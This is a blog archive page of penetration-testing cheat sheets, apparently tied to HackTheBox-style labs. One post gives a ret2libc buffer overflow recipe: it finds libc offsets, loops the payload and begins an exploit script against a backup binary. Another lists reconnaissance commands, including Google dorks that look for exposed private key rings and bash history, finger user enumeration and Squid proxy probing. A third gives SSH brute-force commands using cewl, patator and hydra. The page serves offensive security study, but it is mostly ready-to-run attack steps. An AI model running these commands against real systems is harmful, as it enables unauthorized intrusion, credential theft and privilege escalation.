Skip to main content

Posts

Showing posts from August, 2019

Buffer Over Flow Exploitation

Check if there is a Buffer Over Flow Vuln: ldd /usr/bin/filename | grep libc libc.so.6 => /lib32/libc.so.6 (0xf75df000) Get The value of System: readelf -s /lib32/libc.so.6 | grep system 245: 00110820 68 FUNC svcerr_systemerr@@GLIBC_2.0 627: 0003a940 55 FUNC _libc_system@@GLIBC_PRIVATE 1457: 0003a940 55 FUNC system@@GLIBC_2.0 we need the value of system@@GLIBC_2.0 " 0003a940"   Get The value of Exit: readelf -s /lib32/libc.so.6 | grep exit 2263: 0002e7d0 78 FUNC on_exit@@GLIBC_2.0 Get The value of /bin/sh in libc: strings -a -t x /lib32/libc.so.6 | grep /bin/sh 15900b /bin/sh while true; do /usr/local/bin/backup -i $(python -c 'print "A" * 512 + "\x40\xa9\x03\x00\xb0\xe7\x02\x00\x0b\x90\x15\x00"'); done   IPPSEC Buffer Overflow Exploit Code: from subprocess import call import struct libc_base_addr = 0xf75b000 system_off=0x0003a940 #system offset exit_off=0x0002e7d0 #exit offset a

Reconnaissance

Google Enum #Finding PGP and GnuPG Private Key rings site:domain.com intitle:index.of intext:"secring.skr"| "secring.pgp" | "secring.bak" #Shell History files in interesting domains site:domain.com intitle:index.of bash_history #Nessus Scan Results intitle:"Nessus Scan Report" "This file was generated by Nessus" SearchDiggity GUI tool Finger Enumeration Finger Enum Script finger @10.10.10.76 perl finger-user-enum.pl -U ../../SecLists/Usernames/Names/names.txt -t 10.10.10.76 finger root@10.10.10.76 Enumerating Squid Proxy nikto -h 10.10.10.10 -useproxy http://10.10.10.10:3128 get /etc/squid/squid.conf get /etc/squid/squid.cgf get /etc/squid/squid.config Set a profile in foxy proxy to change to the squid proxy and add creds in it to access it properly. Burp Settings: add upstream proxy --> destination: * host : IP_ADDRESS port : 3128 Authentication type: Basic Username: creds Password: creds Set foxyproxy to use b

Brute Force a SSH Password and Username

Creating a Wordlist based on keywords from a page cewl 10.10.10.46 > wordlist.txt --> Create a Word list based on the files/words/links available in the web pag Brute Force SSH: patator ssh_login host=10.10.10.76 port=22 user=someone password=FILE0 0=probable-v2-top1575.txt persistent=0 https://github.com/lanjelot/patator.git Brute Force SSH Password or Username: hydra -L /usr/share/wordlists.rockyou.txt -P /usr/share/wordlists/rockyou.txt -M Documents/ip.txt -t 4 ssh hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.105 -t 4 ssh hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.105 -t 4 -e nsr ssh -t = Number of threads used -P = Wordlist for Passwords -L = WOrdlist for username -p = Password -l = username -M = List of targets -s = change ssh port to test -e = more ways to test; n= null; s = same ; r =reverse; nsr checks for same username and pass, null pass and reverse the username Brute force any Server, Port: ht